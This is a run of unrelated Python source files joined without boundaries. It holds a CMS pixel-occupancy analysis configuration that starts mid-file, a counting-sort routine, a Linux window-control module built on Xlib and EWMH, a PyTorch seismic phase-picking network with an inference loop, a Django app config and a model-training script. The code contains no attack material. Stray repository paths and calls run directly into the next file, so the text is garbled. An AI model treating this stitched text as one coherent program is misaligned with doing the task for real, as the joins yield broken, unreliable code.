cms.InputTag("siPixelClusters"), withClusterSize = cms.untracked.bool(True), wantedSubDets = cms.VPSet() ) process.spclusoccuprod.wantedSubDets.extend(OccupancyPlotsPixelWantedSubDets) process.spclusoccuprodontrack=process.spclusoccuprod.clone(clusterdigiCollection = cms.InputTag("AlignmentTrackSelector")) process.spclusoccuprodxy = process.spclusoccuprod.clone() 
process.spclusoccuprodxy.wantedSubDets = OccupancyPlotsFPIXmDetailedWantedSubDets process.spclusoccuprodxy.wantedSubDets.extend(OccupancyPlotsFPIXpDetailedWantedSubDets) process.spclusoccuprodxyontrack=process.spclusoccuprodxy.clone(clusterdigiCollection = cms.InputTag("AlignmentTrackSelector")) process.seqMultProd = cms.Sequence(#process.ssclusmultprod + process.ssclusoccuprod + process.spclusmultprod + process.spclusoccuprod + process.spclusmultprodontrack + process.spclusoccuprodontrack + process.spclusmultprodxy + process.spclusoccuprodxy + process.spclusmultprodxyontrack + process.spclusoccuprodxyontrack ) process.load("DPGAnalysis.SiStripTools.occupancyplots_cfi") #process.occupancyplots.wantedSubDets = OccupancyPlotsStripWantedSubDets process.occupancyplots.file = cms.untracked.FileInPath("SLHCUpgradeSimulations/Geometry/data/PhaseII/Tilted/PixelSkimmedGeometry.txt") process.pixeloccupancyplots = process.occupancyplots.clone() process.pixeloccupancyplots.wantedSubDets = process.spclusmultprod.wantedSubDets process.pixeloccupancyplots.multiplicityMaps = cms.VInputTag(cms.InputTag("spclusmultprod")) process.pixeloccupancyplots.occupancyMaps = cms.VInputTag(cms.InputTag("spclusoccuprod")) process.pixeloccupancyxyplots = process.occupancyplots.clone() process.pixeloccupancyxyplots.wantedSubDets = process.spclusmultprodxy.wantedSubDets process.pixeloccupancyxyplots.multiplicityMaps = cms.VInputTag(cms.InputTag("spclusmultprodxy")) process.pixeloccupancyxyplots.occupancyMaps = cms.VInputTag(cms.InputTag("spclusoccuprodxy")) process.pixeloccupancyplotsontrack = process.occupancyplots.clone() process.pixeloccupancyplotsontrack.wantedSubDets = process.spclusmultprodontrack.wantedSubDets process.pixeloccupancyplotsontrack.multiplicityMaps = cms.VInputTag(cms.InputTag("spclusmultprodontrack")) process.pixeloccupancyplotsontrack.occupancyMaps = cms.VInputTag(cms.InputTag("spclusoccuprodontrack")) process.pixeloccupancyxyplotsontrack = process.pixeloccupancyxyplots.clone() process.pixeloccupancyxyplotsontrack.wantedSubDets = process.spclusmultprodxyontrack.wantedSubDets process.pixeloccupancyxyplotsontrack.multiplicityMaps = cms.VInputTag(cms.InputTag("spclusmultprodxyontrack")) process.pixeloccupancyxyplotsontrack.occupancyMaps = cms.VInputTag(cms.InputTag("spclusoccuprodxyontrack")) #process.alloccupancyplots = process.occupancyplots.clone() #process.alloccupancyplots.wantedSubDets = cms.VPSet() #process.alloccupancyplots.wantedSubDets.extend(OccupancyPlotsPixelWantedSubDets) #process.alloccupancyplots.wantedSubDets.extend(OccupancyPlotsStripWantedSubDets) #process.alloccupancyplots.multiplicityMaps = cms.VInputTag(cms.InputTag("spclusmultprod"),cms.InputTag("ssclusmultprod")) #process.alloccupancyplots.occupancyMaps = cms.VInputTag(cms.InputTag("spclusoccuprod"),cms.InputTag("ssclusoccuprod")) #process.load("TrackingPFG.Utilities.bxlumianalyzer_cfi") process.goodVertices = cms.EDFilter("VertexSelector", src = cms.InputTag("offlinePrimaryVertices"), cut = cms.string("!isFake && ndof > 4 && abs(z) <= 24 && position.Rho <= 2"), filter = cms.bool(False), # otherwise it won't filter the events, just produce an empty vertex collection. 
) process.load("Validation.RecoVertex.anotherprimaryvertexanalyzer_cfi") process.primaryvertexanalyzer.pvCollection=cms.InputTag("goodVertices") process.primaryvertexanalyzer.vHistogramMakerPSet.runHisto=cms.untracked.bool(False) process.primaryvertexanalyzer.vHistogramMakerPSet.runHistoProfile=cms.untracked.bool(False) process.primaryvertexanalyzer.vHistogramMakerPSet.runHistoBXProfile=cms.untracked.bool(False) process.seqAnalyzers = cms.Sequence( #process.bxlumianalyzer + process.goodVertices + process.primaryvertexanalyzer + # process.occupancyplots + process.pixeloccupancyplots + process.pixeloccupancyplotsontrack + process.pixeloccupancyxyplots + process.pixeloccupancyxyplotsontrack) #------------------------------------------------------------------------------------------- process.load("Alignment.CommonAlignmentProducer.AlignmentTrackSelector_cfi") process.AlignmentTrackSelector.etaMin = cms.double(-5.) process.AlignmentTrackSelector.etaMax = cms.double(5.) process.seqProducers = cms.Sequence(process.AlignmentTrackSelector + process.seqMultProd) process.load("DPGAnalysis.SiStripTools.trackcount_cfi") process.trackcount.trackCollection = cms.InputTag("generalTracks") process.trackcount.etaMin= cms.untracked.double(-4.) process.trackcount.etaMax= cms.untracked.double(4.) process.trackcount.netabin1D=cms.untracked.uint32(160) process.trackcount.netabin2D=cms.untracked.uint32(50) process.trackcount.nchi2bin1D=cms.untracked.uint32(1000) process.trackcount.nndofbin1D=cms.untracked.uint32(200) process.trackcount.nchi2bin2D=cms.untracked.uint32(400) process.trackcount.nndofbin2D=cms.untracked.uint32(100) process.trackcount.wanted2DHistos=cms.untracked.bool(True) process.load("DPGAnalysis.SiStripTools.duplicaterechits_cfi") #----GlobalTag ------------------------ #process.load("Configuration.StandardSequences.GeometryDB_cff") #process.load('Configuration.Geometry.GeometryExtendedPhase2TkBE5DPixel10DReco_cff') process.load('Configuration.Geometry.GeometryExtended2023D3Reco_cff') process.load('Configuration.StandardSequences.MagneticField_cff') #process.load("Configuration.Geometry.GeometryExtendedPhaseIPixelReco_cff") #process.load("Configuration.Geometry.GeometryExtendedPhaseIPixel_cff") process.load("Configuration.StandardSequences.Reconstruction_cff") from SLHCUpgradeSimulations.Configuration.phase2TkCustomsBE5DPixel10D import * process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff") from Configuration.AlCa.GlobalTag import GlobalTag process.GlobalTag = GlobalTag(process.GlobalTag, options.globalTag, '') #from Configuration.AlCa.GlobalTag import GlobalTag #process.GlobalTag = GlobalTag(process.GlobalTag, 'auto:upgradePLS3', '') process.siStripQualityESProducer.ListOfRecordToMerge=cms.VPSet( # cms.PSet( record = cms.string("SiStripDetVOffRcd"), tag = cms.string("") ), cms.PSet( record = cms.string("SiStripDetCablingRcd"), tag = cms.string("") ), cms.PSet( record = cms.string("RunInfoRcd"), tag = cms.string("") ), cms.PSet( record = cms.string("SiStripBadChannelRcd"), tag = cms.string("") ), cms.PSet( record = cms.string("SiStripBadFiberRcd"), tag = cms.string("") ), cms.PSet( record = cms.string("SiStripBadModuleRcd"), tag = cms.string("") ) ) process.TFileService = cms.Service('TFileService', # fileName = cms.string('OccupancyPlotsTest_newschema.root') # fileName = cms.string('OccupancyPlotsTest_phase2.root') fileName = cms.string('OccupancyPlotsTest_phase2_'+options.tag+'.root') ) process = customise_Reco(process,0) process = customise_condOverRides(process) 
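# ---------------------------------------------------------------------------
# Usage sketch (not part of the original configuration): the job is steered by
# the VarParsing options registered at the top of this file (globalTag,
# HLTprocess, triggerPath) plus the options it inherits from
# VarParsing("analysis") and already uses above (inputFiles, maxEvents, tag).
# Both file names below are placeholders, not values from this config:
#
#   cmsRun OccupancyPlotsTest_phase2_cfg.py globalTag=<your_GlobalTag> \
#          inputFiles=file:step3.root maxEvents=100 tag=test triggerPath="HLT_*"
#
# To inspect the fully expanded configuration, uncomment the
# "print process.dumpPython()" line at the end of the file.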
process.myrereco = cms.Sequence( process.siPixelRecHits + process.trackingGlobalReco) process.p0 = cms.Path( process.myrereco + process.seqHLTSelection + process.seqProducers + process.seqAnalyzers + process.trackcount + process.duplicaterechits ) #print process.dumpPython() # Author: # Approach: # Counting sort, like radix sort and bucket sort, # is an integer based algorithm (i.e. the values of the input # array are assumed to be integers). Hence counting sort is # among the fastest sorting algorithms around, in theory. The # particular distinction for counting sort is that it creates # a bucket for each value and keep a counter in each bucket. # Then each time a value is encountered in the input collection, # the appropriate counter is incremented. Because counting sort # creates a bucket for each value, an imposing restriction is # that the maximum value in the input array be known beforehand. # Implementation notes: # 1] Since the values range from 0 to k, create k+1 buckets. # 2] To fill the buckets, iterate through the input list and # each time a value appears, increment the counter in its # bucket. # 3] Now fill the input list with the compressed data in the # buckets. Each bucket's key represents a value in the # array. So for each bucket, from smallest key to largest, # add the index of the bucket to the input array and # decrease the counter in said bucket by one; until the # counter is zero. # Best Case O(n+k); Average Case O(n+k); Worst Case O(n+k), # where n is the size of the input array and k means the # values range from 0 to k. def countingSort(myList): maxValue = 0 for i in range(len(myList)): if myList[i] > maxValue: maxValue = myList[i] buckets = [0] * (maxValue + 1) for i in myList: buckets[i] += 1 i = 0 for j in range(maxValue + 1): for a in range(buckets[j]): myList[i] = j i += 1 return myList if __name__ == '__main__': sortedList = countingSort([1,23,4,5,6,7,8]) print(sortedList) #!/usr/bin/python # -*- coding: utf-8 -*- import os import sys import platform import time import Xlib.X import Xlib.display import ewmh import pyautogui from pygetwindow import PyGetWindowException, pointInRect, BaseWindow, Rect, Point, Size DISP = Xlib.display.Display() ROOT = DISP.screen().root EWMH = ewmh.EWMH(_display=DISP, root=ROOT) # WARNING: Changes are not immediately applied, specially for hide/show (unmap/map) # You may set wait to True in case you need to effectively know if/when change has been applied. 
WAIT_ATTEMPTS = 10 WAIT_DELAY = 0.025 # Will be progressively increased on every retry # These _NET_WM_STATE_ constants are used to manage Window state and are documented at # https://ewmh.readthedocs.io/en/latest/ewmh.html STATE_NULL = 0 STATE_MODAL = '_NET_WM_STATE_MODAL' STATE_STICKY = '_NET_WM_STATE_STICKY' STATE_MAX_VERT = '_NET_WM_STATE_MAXIMIZED_VERT' STATE_MAX_HORZ = '_NET_WM_STATE_MAXIMIZED_HORZ' STATE_SHADED = '_NET_WM_STATE_SHADED' STATE_SKIP_TASKBAR = '_NET_WM_STATE_SKIP_TASKBAR' STATE_SKIP_PAGER = '_NET_WM_STATE_SKIP_PAGER' STATE_HIDDEN = '_NET_WM_STATE_HIDDEN' STATE_FULLSCREEN = '_NET_WM_STATE_FULLSCREEN' STATE_ABOVE = '_NET_WM_STATE_ABOVE' STATE_BELOW = '_NET_WM_STATE_BELOW' STATE_ATTENTION = '_NET_WM_STATE_DEMANDS_ATTENTION' STATE_FOCUSED = '_NET_WM_STATE_FOCUSED' # EWMH/Xlib set state actions ACTION_UNSET = 0 # Add state ACTION_SET = 1 # Remove state ACTION_TOGGLE = 2 # Toggle state # EWMH/Xlib State Hints HINT_STATE_WITHDRAWN = 0 HINT_STATE_NORMAL = 1 HINT_STATE_ICONIC = 3 def getActiveWindow(): """Returns a Window object of the currently active Window or None.""" win_id = EWMH.getActiveWindow() if win_id: return LinuxWindow(win_id) return None def getActiveWindowTitle(): """Returns a string of the title text of the currently active (focused) Window.""" win = getActiveWindow() if win: return win.title else: return "" def getWindowsAt(x, y): """Returns a list of Window objects whose windows contain the point ``(x, y)``. * ``x`` (int): The x position of the window(s). * ``y`` (int): The y position of the window(s).""" windowsAtXY = [] for win in getAllWindows(): if pointInRect(x, y, win.left, win.top, win.width, win.height): windowsAtXY.append(win) return windowsAtXY def getWindowsWithTitle(title): """Returns a Window object list with the given name.""" matches = [] for win in getAllWindows(): if win.title == title: matches.append(win) return matches def getAllTitles(): """Returns a list of strings of window titles for all visible windows.""" return [window.title for window in getAllWindows()] def getAllWindows(): """Returns a list of strings of window titles for all visible windows.""" windows = EWMH.getClientList() return [LinuxWindow(window) for window in windows] class LinuxWindow(BaseWindow): def __init__(self, hWnd): self._hWnd = hWnd self._setupRectProperties() # self._saveWindowInitValues() # Store initial Window parameters to allow reset and other actions def _getWindowRect(self): """Returns a rect of window position and size (left, top, right, bottom). It follows ctypes format for compatibility""" # https://stackoverflow.com/questions/12775136/get-window-position-and-size-in-python-with-xlib - mgalgs win = self._hWnd x = y = w = h = 0 geom = win.get_geometry() (x, y) = (geom.x, geom.y) while True: parent = win.query_tree().parent pgeom = parent.get_geometry() x += pgeom.x y += pgeom.y if parent.id == ROOT.id: break win = parent w = geom.width h = geom.height return Rect(x, y, x + w, y + h) def _saveWindowInitValues(self): # Saves initial rect values to allow reset to original position, size, state and hints. 
self._init_left, self._init_top, self._init_right, self._init_bottom = self._getWindowRect() self._init_width = self._init_right - self._init_left self._init_height = self._init_bottom - self._init_top self._init_state = self._hWnd.get_wm_state() self._init_hints = self._hWnd.get_wm_hints() self._init_normal_hints = self._hWnd.get_wm_normal_hints() # self._init_attributes = self._hWnd.get_attributes() # can't be modified, so not saving it def __repr__(self): return '%s(hWnd=%s)' % (self.__class__.__name__, self._hWnd) def __eq__(self, other): return isinstance(other, LinuxWindow) and self._hWnd == other._hWnd def close(self): """Closes this window. This may trigger "Are you sure you want to quit?" dialogs or other actions that prevent the window from actually closing. This is identical to clicking the X button on the window.""" EWMH.setCloseWindow(self._hWnd) EWMH.display.flush() def _get_wm(self): # https://stackoverflow.com/questions/3333243/how-can-i-check-with-python-which-window-manager-is-running return os.environ.get('XDG_CURRENT_DESKTOP') or "" def minimize(self, wait=False): """Minimizes this window. Use 'wait' option to confirm action requested (in a reasonable time). Returns ''True'' if window was minimized""" if not self.isMinimized: if "GNOME" in self._get_wm(): # Keystroke hack. Tested OK on Ubuntu/Unity self.activate(wait=True) pyautogui.hotkey('winleft', 'h') else: # This is working OK at least on Mint/Cinnamon and Raspbian/LXDE hints = self._hWnd.get_wm_hints() prev_state = hints["initial_state"] hints["initial_state"] = HINT_STATE_ICONIC self._hWnd.set_wm_hints(hints) self.hide(wait=wait) self.show(wait=wait) hints["initial_state"] = prev_state self._hWnd.set_wm_hints(hints) retries = 0 while wait and retries < WAIT_ATTEMPTS and not self.isMinimized: retries += 1 time.sleep(WAIT_DELAY * retries) return self.isMinimized def maximize(self, wait=False): """Maximizes this window. Use 'wait' option to confirm action requested (in a reasonable time). Returns ''True'' if window was maximized""" if not self.isMaximized: EWMH.setWmState(self._hWnd, ACTION_SET, STATE_MAX_VERT, STATE_MAX_HORZ) EWMH.display.flush() retries = 0 while wait and retries < WAIT_ATTEMPTS and not self.isMaximized: retries += 1 time.sleep(WAIT_DELAY * retries) return self.isMaximized def restore(self, wait=False): """If maximized or minimized, restores the window to it's normal size. Use 'wait' option to confirm action requested (in a reasonable time). Returns ''True'' if window was restored""" # Activation is enough to restore a minimized window in GNOME/Unity, CINNAMON and LXDE self.activate(wait=wait) if self.isMaximized: EWMH.setWmState(self._hWnd, ACTION_UNSET, STATE_MAX_VERT, STATE_MAX_HORZ) EWMH.display.flush() retries = 0 while wait and retries < WAIT_ATTEMPTS and (self.isMaximized or self.isMinimized): retries += 1 time.sleep(WAIT_DELAY * retries) return not self.isMaximized and not self.isMinimized def hide(self, wait=False): """If hidden or showing, hides the window from screen and title bar. Use 'wait' option to confirm action requested (in a reasonable time). Returns ''True'' if window was hidden (unmapped)""" win = DISP.create_resource_object('window', self._hWnd) win.unmap_sub_windows() DISP.sync() win.unmap() DISP.sync() retries = 0 while wait and retries < WAIT_ATTEMPTS and self._isMapped: retries += 1 time.sleep(WAIT_DELAY * retries) return not self._isMapped def show(self, wait=False): """If hidden or showing, shows the window on screen and in title bar. 
Use 'wait' option to confirm action requested (in a reasonable time). Returns ''True'' if window is showing (mapped)""" win = DISP.create_resource_object('window', self._hWnd) win.map() DISP.sync() win.map_sub_windows() DISP.sync() retries = 0 while wait and retries < WAIT_ATTEMPTS and not self._isMapped: retries += 1 time.sleep(WAIT_DELAY * retries) return self._isMapped def activate(self, wait=False): """Activate this window and make it the foreground (focused) window. Use 'wait' option to confirm action requested (in a reasonable time). Returns ''True'' if window was activated""" if "arm" in platform.platform(): EWMH.setWmState(self._hWnd, ACTION_SET, STATE_ABOVE, STATE_NULL) else: EWMH.setActiveWindow(self._hWnd) EWMH.display.flush() retries = 0 while wait and retries < WAIT_ATTEMPTS and not self.isActive: retries += 1 time.sleep(WAIT_DELAY * retries) return self.isActive def resize(self, widthOffset, heightOffset, wait=False): """Resizes the window relative to its current size. Use 'wait' option to confirm action requested (in a reasonable time) Returns ''True'' if window was resized to the given size""" return self.resizeTo(self.width + widthOffset, self.height + heightOffset, wait) resizeRel = resize # resizeRel is an alias for the resize() method. def resizeTo(self, newWidth, newHeight, wait=False): """Resizes the window to a new width and height. Use 'wait' option to confirm action requested (in a reasonable time). Returns ''True'' if window was resized to the given size""" EWMH.setMoveResizeWindow(self._hWnd, x=self.left, y=self.top, w=newWidth, h=newHeight) EWMH.display.flush() retries = 0 while wait and retries < WAIT_ATTEMPTS and (self.width != newWidth or self.height != newHeight): retries += 1 time.sleep(WAIT_DELAY * retries) return self.width == newWidth and self.height == newHeight def move(self, xOffset, yOffset, wait=False): """Moves the window relative to its current position. Use 'wait' option to confirm action requested (in a reasonable time). Returns ''True'' if window was moved to the given position""" return self.moveTo(self.left + xOffset, self.top + yOffset, wait) moveRel = move # moveRel is an alias for the move() method. def moveTo(self, newLeft, newTop, wait=False): """Moves the window to new coordinates on the screen. Use 'wait' option to confirm action requested (in a reasonable time). 
Returns ''True'' if window was moved to the given position""" if newLeft >= 0 and newTop >= 0: # Xlib/EWMH won't accept negative positions EWMH.setMoveResizeWindow(self._hWnd, x=newLeft, y=newTop, w=self.width, h=self.height) EWMH.display.flush() retries = 0 while wait and retries < WAIT_ATTEMPTS and (self.left != newLeft or self.top != newTop): retries += 1 time.sleep(WAIT_DELAY * retries) return self.left == newLeft and self.top == newTop def _moveResizeTo(self, newLeft, newTop, newWidth, newHeight): if newLeft >= 0 and newTop >= 0: # Xlib/EWMH won't accept negative positions EWMH.setMoveResizeWindow(self._hWnd, x=newLeft, y=newTop, w=newWidth, h=newHeight) EWMH.display.flush() return @property def isMinimized(self): """Returns ``True`` if the window is currently minimized.""" state = EWMH.getWmState(self._hWnd, str=True) return STATE_HIDDEN in state @property def isMaximized(self): """Returns ``True`` if the window is currently maximized.""" state = EWMH.getWmState(self._hWnd, str=True) return STATE_MAX_VERT in state and STATE_MAX_HORZ in state @property def isActive(self): """Returns ``True`` if the window is currently the active, foreground window.""" win = EWMH.getActiveWindow() return win == self._hWnd @property def title(self): """Returns the window title as a string.""" name = EWMH.getWmName(self._hWnd) return name @property def visible(self): """Returns ``True`` if the window is currently visible.""" win = DISP.create_resource_object('window', self._hWnd) state = win.get_attributes().map_state return state == Xlib.X.IsViewable @property def _isMapped(self): # Returns ``True`` if the window is currently mapped win = DISP.create_resource_object('window', self._hWnd) state = win.get_attributes().map_state return state != Xlib.X.IsUnmapped def cursor(): """Returns the current xy coordinates of the mouse cursor as a two-integer tuple Returns: (x, y) tuple of the current xy coordinates of the mouse cursor. """ mp = ROOT.query_pointer() mp = [mp.root_x, mp.root_y] return Point(mp[0], mp[1]) def resolution(): """Returns the width and height of the screen as a two-integer tuple. Returns: (width, height) tuple of the screen size, in pixels. """ res = EWMH.getDesktopGeometry() return Size(res[0], res[1]) def displayWindowsUnderMouse(xOffset=0, yOffset=0): """This function is meant to be run from the command line. 
It will automatically show mouse pointer position and windows names under it""" if xOffset != 0 or yOffset != 0: print('xOffset: %s yOffset: %s' % (xOffset, yOffset)) try: prevWindows = None while True: x, y = cursor() positionStr = 'X: ' + str(x - xOffset).rjust(4) + ' Y: ' + str(y - yOffset).rjust(4) + ' (Press Ctrl-C to quit)' if prevWindows is not None: sys.stdout.write(positionStr) sys.stdout.write('\b' * len(positionStr)) windows = getWindowsAt(x, y) if windows != prevWindows: print('\n') prevWindows = windows for win in windows: name = win.title eraser = '' if len(name) >= len(positionStr) else ' ' * (len(positionStr) - len(name)) sys.stdout.write(name + eraser + '\n') sys.stdout.flush() time.sleep(0.3) except KeyboardInterrupt: sys.stdout.write('\n\n') sys.stdout.flush() def main(): """Run this script from command-line to get windows under mouse pointer""" print("PLATFORM:", sys.platform) print("SCREEN SIZE:", resolution()) npw = getActiveWindow() print("ACTIVE WINDOW:", npw.title, "/", npw.box) print("") displayWindowsUnderMouse(0, 0) if __name__ == "__main__": main() import torch import torch.nn as nn import torch.nn.functional as F from torch.quantization import QuantStub, DeQuantStub, fuse_modules class ConvBNReLU(nn.Sequential): """ 三个层在计算过程中应当进行融合 使用ReLU作为激活函数可以限制 数值范围,从而有利于量化处理。 """ def __init__(self, n_in, n_out, kernel_size=3, stride=1, groups=1, norm_layer=nn.BatchNorm2d): # padding为same时两边添加(K-1)/2个0 padding = (kernel_size - 1) // 2 # 本层构建三个层,即0:卷积,1:批标准化,2:ReLU super(ConvBNReLU, self).__init__( nn.Conv2d(n_in, n_out, [1, kernel_size], stride, [0, padding], groups=groups, bias=False), nn.BatchNorm2d(n_out), nn.ReLU(inplace=True) ) class ConvTBNReLU(nn.Sequential): """ 三个层在计算过程中应当进行融合 使用ReLU作为激活函数可以限制 数值范围,从而有利于量化处理。 """ def __init__(self, n_in, n_out, kernel_size=3, stride=1, padding=1, output_padding=1, bias=True, dilation=1, groups=1, norm_layer=nn.BatchNorm2d): # padding为same时两边添加(K-1)/2个0 # 本层构建三个层,即0:卷积,1:批标准化,2:ReLU super(ConvTBNReLU, self).__init__( nn.UpsamplingBilinear2d(scale_factor=tuple(stride)), nn.Conv2d(n_in, n_out, kernel_size, stride=1, padding=padding), nn.BatchNorm2d(n_out), nn.ReLU(inplace=True) ) class InvertedResidual(nn.Module): """ 本个模块为MobileNetV2中的可分离卷积层 中间带有扩张部分,如图10-2所示 """ def __init__(self, n_in, n_out, stride, expand_ratio, norm_layer=nn.BatchNorm2d): super().__init__() self.stride = stride # 隐藏层需要进行特征拓张,以防止信息损失 hidden_dim = int(round(n_in * expand_ratio)) # 当输出和输出维度相同时,使用残差结构 self.use_res = self.stride == 1 and n_in == n_out # 构建多层 layers = [] if expand_ratio != 1: # 逐点卷积,增加通道数 layers.append( ConvBNReLU(n_in, hidden_dim, kernel_size=1, norm_layer=norm_layer)) layers.extend([ # 逐层卷积,提取特征。当groups=输入通道数时为逐层卷积 ConvBNReLU( hidden_dim, hidden_dim, stride=stride, groups=hidden_dim, norm_layer=norm_layer), # 逐点卷积,本层不加激活函数 nn.Conv2d(hidden_dim, n_out, 1, 1, 0, bias=False), nn.BatchNorm2d(n_out), ]) # 定义多个层 self.conv = nn.Sequential(*layers) def forward(self, x): if self.use_res: return x + self.conv(x) else: return self.conv(x) class QInvertedResidual(InvertedResidual): """量化模型修改""" def __init__(self, *args, **kwargs): super(QInvertedResidual, self).__init__(*args, **kwargs) # 量化模型应当使用量化计算方法 self.skip_add = nn.quantized.FloatFunctional() def forward(self, x): if self.use_res: # 量化加法 #return self.skip_add.add(x, self.conv(x)) return x + self.conv(x) else: return self.conv(x) def fuse_model(self): # 模型融合 for idx in range(len(self.conv)): if type(self.conv[idx]) == nn.Conv2d: # 将本个模块最后的卷积层和BN层融合 fuse_modules( self.conv, [str(idx), str(idx + 1)], 
inplace=True) class Model(nn.Module): def __init__(self, n_stride=8, n_channel=4): super().__init__() self.n_stride = n_stride # 总步长 base = n_channel if n_stride == 8: S = [1, 1, 2, 1, 2, 1, 2] elif n_stride == 16: S = [2, 1, 2, 1, 2, 1, 2] elif n_stride == 32: S = [2, 2, 2, 1, 2, 1, 2] elif n_stride == 64: S = [2, 2, 2, 2, 2, 1, 2] elif n_stride == 128: S = [2, 2, 2, 2, 2, 2, 2] else: raise ValueError("S must in 8, 16, 32, 64 or 128") self.layers = nn.Sequential( QInvertedResidual( 3, base*1, S[0], 2), QInvertedResidual(base*1, base*2, S[1], 2), QInvertedResidual(base*2, base*2, S[2], 2), QInvertedResidual(base*2, base*3, S[3], 2), QInvertedResidual(base*3, base*3, S[4], 2), QInvertedResidual(base*3, base*4, S[5], 2), QInvertedResidual(base*4, base*5, S[6], 2) ) self.class_encoder = nn.Sequential( QInvertedResidual(base*5, base*5, 2, 2), QInvertedResidual(base*5, base*5, 2, 2), QInvertedResidual(base*5, base*5, 2, 2), ConvTBNReLU(base*5, base*5, [1, 5], stride=[1, 2], padding=[0, 2], output_padding=[0, 1], bias=False, dilation=1), ConvTBNReLU(base*5, base*5, [1, 5], stride=[1, 2], padding=[0, 2], output_padding=[0, 1], bias=False, dilation=1), ConvTBNReLU(base*5, base*5, [1, 5], stride=[1, 2], padding=[0, 2], output_padding=[0, 1], bias=False, dilation=1), ) self.cl = nn.Conv2d(base * 5 * 2, 3, 1) self.tm = nn.Conv2d(base * 5 * 2, 1, 1) def fuse_model(self): for m in self.modules(): if type(m) == ConvBNReLU: fuse_modules(m, ['0', '1', '2'], inplace=True) if type(m) == ConvTBNReLU: fuse_modules(m, ['1', '2', '3'], inplace=True) if type(m) == QInvertedResidual: m.fuse_model() def forward(self, x, device): B, C, T = x.shape t = torch.arange(T) * 2 * 3.141592658 / 4 p = torch.stack([torch.sin(t), torch.sin(2*t), torch.sin(4*t)], dim=0).to(device) p = torch.unsqueeze(p, 0) x = x + p x = x.unsqueeze(2) x1 = self.layers(x) x2 = self.class_encoder(x1) x = torch.cat([x1, x2], dim=1) out_class = self.cl(x).squeeze() out_time = self.tm(x).squeeze() out_time = out_time * self.n_stride out_time = out_time.squeeze() B, C, T = out_class.shape outputs = [] prob = F.softmax(out_class, 1) return prob, out_time import utils import time import numpy as np import scipy.signal as signal #import tensorflow as tf def find_phase(prob, regr, delta=1.0, height=0.80, dist=1): shape = np.shape(prob) all_phase = [] phase_name = {0:"N", 1:"P", 2:"S"} for itr in range(shape[0]): phase = [] for itr_c in [0, 1]: p = prob[itr, itr_c+1, :] #p = signal.convolve(p, np.ones([10])/10., mode="same") h = height peaks, _ = signal.find_peaks(p, height=h, distance=dist) for itr_p in peaks: phase.append( [ itr_c+1, #phase_name[itr_c], itr_p*delta+regr[itr, itr_p], prob[itr, itr_c, itr_p], itr_p*delta ] ) all_phase.append(phase) return all_phase def main(args): data_tool = utils.DataTest(batch_size=100, n_length=3072) models = [] outfiles = [] strides = [] for i in [int(i) for i in args.feature.split(",")]: for j in [int(i) for i in args.stride.split(",")]: stride = j nchannel = i model_name = f"ckpt/{stride}-{nchannel}.wave" device = torch.device("cuda:1") model = Model(n_stride=stride, n_channel=nchannel) model.load_state_dict(torch.load(model_name)) model.eval() model.to(device) model.fuse_model() acc_time = 0 file_ = open(f"stdata/fuse.{nchannel}-{stride}.stat.txt", "w") models.append(model) strides.append(stride) outfiles.append(file_) datalen = 3072 for step in range(400): a1, a2, a3, a4 = data_tool.batch_data() time1 = time.perf_counter() a1 = torch.tensor(a1, dtype=torch.float32, device=device) a1 = a1.permute(0, 2, 1) for 
model, outfile, stride in zip(models, outfiles, strides): with torch.no_grad(): oc, ot = model(a1, device) oc = oc.cpu().numpy() ot = ot.cpu().numpy() phase = find_phase(oc, ot, stride, height=0.3, dist=500) for idx in range(len(a2)): is_noise = a2[idx] pt, st = a4[idx] snr = np.mean(a3[idx]) if pt<0 or st<0: continue if is_noise: outfile.write("#none\n") else: if st > datalen: outfile.write(f"#phase,{pt},{-100},{snr}\n") else: outfile.write(f"#phase,{pt},{st},{snr}\n") for p in phase[idx]: outfile.write(f"{p[0]},{p[1]},{p[2]}\n") outfile.flush() time2 = time.perf_counter() print(step, f"Finished! {time2-time1}") import argparse if __name__ == "__main__": parser = argparse.ArgumentParser(description="") parser.add_argument('-f', '--feature', default="4,8,16", type=str, help="base number of feature") parser.add_argument('-s', '--stride', default="8,16,32", type=str, help="stride of model") parser.add_argument('-i', '--input', default="data", help="dataset dir") parser.add_argument('-o', '--output', default="outdata", help="output dir") args = parser.parse_args() main(args) main([])bug_app/apps.py from django.apps import AppConfig class BugAppConfig(AppConfig): name = 'bug_app' from core.utils import parse_args, setup_determinism from core.utils import build_loss_func, build_optim from core.utils import build_scheduler, load_checkpoint from core.config import get_cfg_defaults from core.dataset import build_dataloader from core.model import build_model, train_loop, valid_model, test_model # from core.model import valid_model_macro # from torch.utils.tensorboard import SummaryWriter from torch.cuda.amp import GradScaler import torch.nn as nn import os import torch.multiprocessing torch.multiprocessing.set_sharing_strategy("file_system") # SET UP GLOBAL VARIABLE scaler = GradScaler() def main(cfg, args): # Setup logger # sum_writer = SummaryWriter(f"test2") # Declare variables best_metric = 0 start_epoch = 0 mode = args.mode # Setup folder if not os.path.isdir(cfg.DIRS.WEIGHTS): os.mkdir(cfg.DIRS.WEIGHTS) # Load Data trainloader = build_dataloader(cfg, mode="train") validloader = build_dataloader(cfg, mode="valid") # testloader = build_dataloader(cfg, mode="test") # Define model/loss/optimizer/Scheduler model = build_model(cfg) # model = nn.DataParallel(model) # loss = build_loss_func(cfg) weight=torch.Tensor([0.1, 0.1, 0.1, 1.5]) weight = weight.to("cuda") loss = nn.CrossEntropyLoss(weight=weight) optimizer = build_optim(cfg, model) scheduler = build_scheduler(args, len(trainloader), cfg) # Load model checkpoint model, start_epoch, best_metric = load_checkpoint(args, model) start_epoch = 0 best_metric = 0 if cfg.SYSTEM.GPU: model = model.cuda() # Run Script if mode == "train": for epoch in range(start_epoch, cfg.TRAIN.EPOCHES): print("EPOCH", epoch) train_loss = train_loop( cfg, epoch, model, trainloader, loss, scheduler, optimizer, scaler ) best_metric = valid_model( cfg, mode, epoch, model, validloader, loss, best_metric=best_metric, save_prediction= False, visual=False ) elif mode == "valid": valid_model( cfg, mode, 0, model, validloader, loss, best_metric=best_metric, save_prediction=True, visual=True ) elif mode == "test": test_model(cfg, mode, model, validloader, loss) if __name__ == "__main__": # Set up Variable seed = 10 args = parse_args() cfg = get_cfg_defaults() if args.config != "": cfg.merge_from_file(args.config) # Set seed for reproducible result setup_determinism(seed) main(cfg, args) ecds/readux # pylint: disable = attribute-defined-outside-init, too-few-public-methods 
